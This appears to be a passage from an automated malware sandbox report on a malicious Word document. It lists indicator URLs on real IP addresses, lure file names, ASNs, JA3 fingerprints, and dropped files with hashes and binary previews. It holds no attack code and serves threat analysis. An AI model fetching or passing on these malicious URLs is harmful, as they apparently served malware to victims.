                                          • 167.71.148.58:443/495u60b7ajrab1a3v/6l2h13gy/wjaosw38b/dftbhdpoilzw3/em8pnsrzerk714/6919nubsvqxw2911/
                                          Dati.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/i6p9p6/
                                          4693747_2020_7865319.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/dd8xgec1513nstpclm7/1tb9c9bqpxml9mrid55/
                                          ARCH.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/1mpy4lrtxykgw5i/yn5yixx/
                                          LIST_20201229_1397.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/11c0whd0/
                                          documento 2912 2020.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/ra3q90a4b9qy3435u4/3ka3yw5o/4ihgodinbet/ffq83awdif0a69irje1/m9uclpm90mj/
                                          INFO 2020 DWP_947297.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/wps70yc/suknxvfkubdwr/8m58qopltial6j/zs8odemvec0x72h/
                                          166759_2112_2020_U_8180037.docGet hashmaliciousBrowse
                                          • 167.71.148.58:443/cc6a5z5xetc/dbesg63lm3bz6f/ja38o6b5sun54/muj9lb37hjlph/za8htyniz99hyc8cz/8n11um4/
                                          202.187.222.40index.html.dllGet hashmaliciousBrowse
                                          • 202.187.222.40/6knpolw2ea15x/wl5r20ctm3/
                                          Documento_2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40/mwhowwqb/gks2aqnysulsbbf/v6acyr4iy3c91t/ull4jzd9gg/ejl9fk51o96izzc/
                                          List 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                          • 202.187.222.40/3mm3s1d7s7s4pj3/iktbo/gynznozxnj1dq7/5wici4/usvuanvlngtkv/t3gjqtewd3fpq/
                                          MF11374 2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40/qp1n21x/dm6rx/
                                          SecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                          • 202.187.222.40/4q2vp2zhr/tw6gc8b11d4dlpw4o/
                                          INFO-22.docGet hashmaliciousBrowse
                                          • 202.187.222.40/1e56hy0va62yk/mt5n1liyo5hg/6efu94gy/rxzydao0a3bbzw/
                                          Documento_9276701.docGet hashmaliciousBrowse
                                          • 202.187.222.40/3u7zpjzcji/pdgc5fp1c/9tg5/
                                          Dati_2112_122020.docGet hashmaliciousBrowse
                                          • 202.187.222.40/7iga49cgomahelodxo/
                                          Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                          • 202.187.222.40/xqmtay/
                                          as233456.docGet hashmaliciousBrowse
                                          • 202.187.222.40/n91cd/66sk22clombtb17lxc/dr4e/f27un216im1/gx8f2z/gmzqc3/
                                          Y0124.docGet hashmaliciousBrowse
                                          • 202.187.222.40/uoj70yal/

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          dagranitegiare.comList 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                          • 45.119.81.203

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          LVSS-AS-VNLongVanSystemSolutionJSCVNList 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          Refusal-1881267613-10062020.xlsGet hashmaliciousBrowse
                                          • 45.119.83.237
                                          Refusal-1881267613-10062020.xlsGet hashmaliciousBrowse
                                          • 45.119.83.237
                                          Refusal-1881267613-10062020.xlsGet hashmaliciousBrowse
                                          • 45.119.83.237
                                          Crack_BitRecover_PST_Password_R.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          DOC-98524533970.pdfGet hashmaliciousBrowse
                                          • 45.119.83.245
                                          ltmdjf.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          klkdajezvwyhou.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          redafrjfoxy.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          vnubu.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          47Bewerbungsunterlagen - Nina Peter - 17.09.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          10Janine Mosel - Bewerbungsunterlagen - 14.09.2018.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          Janine Mosel - Bewerbungsunterlagen - 14.09.2018.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          8Julia Sammer - Bewerbung und Lebenslauf - 13.09.2018.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          Nadine Walz - Bewerbungsunterlagen - 12.09.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          52Sofia Hubert - Bewerbung und Lebenslauf - 07.09.2018.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          20Bewerbung und Lebenslauf - Sofia Walter - 04.09.2018.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          info.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          srlaph.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          ikwrux.exeGet hashmaliciousBrowse
                                          • 103.27.238.31
                                          DIGITALOCEAN-ASNUSInformacion_29.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          https://pdfsharedmessage.xtensio.com/7wtcdltaGet hashmaliciousBrowse
                                          • 134.209.238.18
                                          readme.docGet hashmaliciousBrowse
                                          • 159.89.126.148
                                          http://cvpro.info/wp-admin/fzNN04Xs2LGKNw6vR3M/Get hashmaliciousBrowse
                                          • 206.189.52.133
                                          http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                          • 167.71.72.151
                                          http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                          • 37.139.1.159
                                          DAT 2020_12_30.docGet hashmaliciousBrowse
                                          • 138.197.202.203
                                          http://yfnyblv.yobinsetio.site/Get hashmaliciousBrowse
                                          • 165.22.207.20
                                          http://mainfreight-6452496282.eritro.ir/retailer.php?ikpah=Z2lvdmFuYS50YWJhcmluaUBtYWluZnJlaWdodC5jb20=Get hashmaliciousBrowse
                                          • 188.166.103.55
                                          #Ud83d#Udcde mkoxlien@hbs.net @ 503 AM 503 AM.pff.HTMGet hashmaliciousBrowse
                                          • 159.89.4.250
                                          https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9Get hashmaliciousBrowse
                                          • 167.172.136.187
                                          #Ud83d#Udcde roberto.hernandez@hoerbiger.com @[DateTime][Name].pff.HTMGet hashmaliciousBrowse
                                          • 159.89.4.250
                                          http://delivery.unlocklocks.com/HSOMEU?id=124732=Jx8EBwNQDgsBTwECUwcIUlUBUx0=QgtZWk8ADFsJdkUDDQ9cU1AITVAdXENVHwYOUlwHUlMHUgMPUFtXAVMPTwoQF0QMHktdXV9aR1cRThYXC10MAl4OWlUKEE1XDVscKjcseXNkW1BcT0UD&fl=DBdARkJeFhdeXFVXEVleAwhYDxhRB1tCAA8AVRBTHQELDhtTYg1eVkAcGet hashmaliciousBrowse
                                          • 139.59.54.187
                                          ARCHIVOFile.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          Doc 2912 75513.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          rib.exeGet hashmaliciousBrowse
                                          • 159.65.44.102
                                          79685175.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          DATI 2020.docGet hashmaliciousBrowse
                                          • 138.197.99.250
                                          7mB0FoVcSn.exeGet hashmaliciousBrowse
                                          • 139.59.19.157
                                          TN22020000560175.exeGet hashmaliciousBrowse
                                          • 138.197.103.178
                                          TTNET-MYTIMEdotComBerhadMY4693747_2020_7865319.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          index.html.dllGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Documento_2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          List 2020_12_21 OZV3903.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          MF11374 2020.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          SecuriteInfo.com.W97M.DownLoader.5028.13042.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          INFO-22.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Documento_9276701.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Dati_2112_122020.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Informacion 122020 N-98239.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          as233456.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          Y0124.docGet hashmaliciousBrowse
                                          • 202.187.222.40
                                          nIUMFDogK0.exeGet hashmaliciousBrowse
                                          • 202.187.199.171
                                          Transfer invoice.vbsGet hashmaliciousBrowse
                                          • 61.6.84.83
                                          REMITTANCE SLI.exeGet hashmaliciousBrowse
                                          • 61.6.13.149
                                          a2.ex.exeGet hashmaliciousBrowse
                                          • 202.184.167.189
                                          meront.exeGet hashmaliciousBrowse
                                          • 61.6.30.223
                                          31PAYMENT ADVIC.exeGet hashmaliciousBrowse
                                          • 61.6.43.245
                                          Wollin_Info.docGet hashmaliciousBrowse
                                          • 202.190.140.230

                                          JA3 Fingerprints

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          05af1f5ca1b87cc9cc9b25185115607ddocuments.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          Shipping Document PL and BL003534.pptGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          Payment Documents.xlsGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          Shipping Document PLBL003534.xlsGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          ST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          6Cprm97UTl.xlsGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          DAT 2020_12_30.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          PSX7103491.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          Beauftragung.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          1I72L29IL3F.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          Adjunto_2021.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          Dok 0501 012021 Q_93291.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          invoice.docGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          spetsifikatsiya.xlsGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          output.xlsGet hashmaliciousBrowse
                                          • 45.119.81.203
                                          output.xlsGet hashmaliciousBrowse
                                          • 45.119.81.203

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          C:\Users\user\Rg0646r\Q90xmrq\M8jklv4.dllList 2020_12_21 OZV3903.docGet hashmaliciousBrowse

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):58936
                                            Entropy (8bit):7.994797855729196
                                            Encrypted:true
                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                            Malicious:false
                                            Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):893
                                            Entropy (8bit):7.366016576663508
                                            Encrypted:false
                                            SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                            MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                            SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                            SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                            SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                            Malicious:false
                                            Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):326
                                            Entropy (8bit):3.1147363886328936
                                            Encrypted:false
                                            SSDEEP:6:kKDawwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:pkPlE99SNxAhUegeT2
                                            MD5:42BAB33729D6AFE2F6C7CF259B74AA3D
                                            SHA1:91C38D646A7E82B67B0DEE11282D8AC68B2478BF
                                            SHA-256:485E0D5F033DAC298FB0788CD57B50E361F7CF64C30B2C5AE836BE7D77E08053
                                            SHA-512:0C295819321E7CDCF813D77C317838FBEA67CA270EBF2F354F5FB4821E7275966E865E1E9D9CBD7EBB87D3EADD43DFD7CF499708C84636F28F510B16DE446D06
                                            Malicious:false
                                            Preview: p...... ..........".>...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):252
                                            Entropy (8bit):3.0294634724686764
                                            Encrypted:false
                                            SSDEEP:3:kkFklLe6E/ltfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFc:kKt6aliBAIdQZV7eAYLit
                                            MD5:FA67AEBE43D711A5CE78354ABE605E72
                                            SHA1:208F8A4FAF7E7132FF937138193D4FDDEEE0AFA9
                                            SHA-256:4709951E558138636C6973555BAB83F608889996ABB890E54641B8FE9D2AA2D4
                                            SHA-512:83178B64130925BDCEF5110C30AF035B739A832DD12B45EAAD129FBB3825C1B70390087B8ED63E0DDC7178332520CE48EA131C77BC1B86D785E9F8B8832A8FBA
                                            Malicious:false
                                            Preview: p...... ....`...v...>...(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB48CD7-B28F-4AE5-86AD-026C320EA73C}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1024
                                            Entropy (8bit):0.05390218305374581
                                            Encrypted:false
                                            SSDEEP:3:ol3lYdn:4Wn
                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                            Malicious:false
                                            Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DB1AF416-0379-4C94-9D0C-259786EC4018}.tmp
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):1536
                                            Entropy (8bit):1.3586208805849456
                                            Encrypted:false
                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbE:IiiiiiiiiifdLloZQc8++lsJe1MzAOn
                                            MD5:85CDE8B53BF93B58839867D96F089CFA
                                            SHA1:71679E74429FED8858DF4C8A504C1AC3CCE748B6
                                            SHA-256:065E9099A8B8CB87EC1626C9B2D84C7DDC39DC9D766E0129B70AF2DC26BE9287
                                            SHA-512:88E0616BBEEAD18941B1C8200E74A29B29DE51F34E48DED0ABE7812984D6542C0D6E93EC41E8CAF4F7FE6F7BE0C0066C93FF64CDFC0DA08FBDD078F7CEFC2B84
                                            Malicious:false
                                            Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Local\Temp\Cab9D3A.tmp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                            Category:dropped
                                            Size (bytes):58936
                                            Entropy (8bit):7.994797855729196
                                            Encrypted:true
                                            SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                            MD5:E4F1E21910443409E81E5B55DC8DE774
                                            SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                            SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                            SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                            Malicious:false
                                            Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                            C:\Users\user\AppData\Local\Temp\Tar9D3B.tmp
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):152533
                                            Entropy (8bit):6.31602258454967
                                            Encrypted:false
                                            SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                            MD5:D0682A3C344DFC62FB18D5A539F81F61
                                            SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                            SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                            SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                            Malicious:false
                                            Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                            C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162688
                                            Entropy (8bit):4.254472445116942
                                            Encrypted:false
                                            SSDEEP:1536:C6n3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CyVNSc83tKBAvQVCgOtmXmLpLm4l
                                            MD5:EE5BE5DA5880BCDBFAABB325C80F4F91
                                            SHA1:04C2A42E0F7E0AA34DB5F6E70BDD715BA98F4F38
                                            SHA-256:1B29C1A61465573EFC5E24AF2F34D18F14B10FDC87F46151CD5A0BF9C755DEC7
                                            SHA-512:034310B9AFEBB169D94D05A7AD98F73D9641E27C123E5EBF57A01290327F84C0FB887D16216AA1CB776CA0C5DF776FAE4A1926A14E75F1A692867A789E49E43D
                                            Malicious:false
                                            Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Info.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Jan 7 20:42:32 2021, length=205824, window=hide
                                            Category:dropped
                                            Size (bytes):1960
                                            Entropy (8bit):4.5252080480118
                                            Encrypted:false
                                            SSDEEP:24:89m/XTwz6IknideS3wDv3qc4dM7dD29m/XTwz6IknideS3wDv3qc4dM7dV:89m/XT3IkKpvfQh29m/XT3IkKpvfQ/
                                            MD5:DE73479E0111158CBF54444A316E44D7
                                            SHA1:349D76E8714E489A3025B792223306A6ED6289B4
                                            SHA-256:DA645708EE9EC397FD481F94A9441A29C3114323C7568EE6EDD70096CEB376F0
                                            SHA-512:E3AC80BAEF20AB3C93D27F8AAEEB2607794BD3E609503FF8AA22AE42901F320F05F208151F48C17A118D389E65223D62CDC3D39FED0F25B508932A1EDA645751
                                            Malicious:false
                                            Preview: L..................F.... ...(....{..(....{..2.[.>....$...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....V.2..$..'RQ. .Info.doc..>.......Q.y.Q.y*...8.....................I.n.f.o...d.o.c.......r...............-...8...[............?J......C:\Users\..#...................\\585948\Users.user\Desktop\Info.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.n.f.o...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......585948..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L..................F
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):50
                                            Entropy (8bit):3.93139801091909
                                            Encrypted:false
                                            SSDEEP:3:M1gl0LDKAlmX1glv:Me8WAV1
                                            MD5:819E7F1E8DEC6A17E9FE80A7F0CDAC81
                                            SHA1:62256F51A722B9476BC00C0DECA00C11F4BDD603
                                            SHA-256:4C7BF443AF5E23507D0A82B450F3428CDC2D42E2D6A0267FEE158ED77BB3CC3C
                                            SHA-512:500D736EE0FE18FEF828F0B2FC78FAF28FE34F95B4E1C3D08CD39A482C0381D767216AC8FF4844EFC48C1C5EF3CA848F790193B4D87BE54DFC4CFC6BF8A1DEB2
                                            Malicious:false
                                            Preview: [doc]..Info.LNK=0..Info.LNK=0..[doc]..Info.LNK=0..
                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):162
                                            Entropy (8bit):2.431160061181642
                                            Encrypted:false
                                            SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
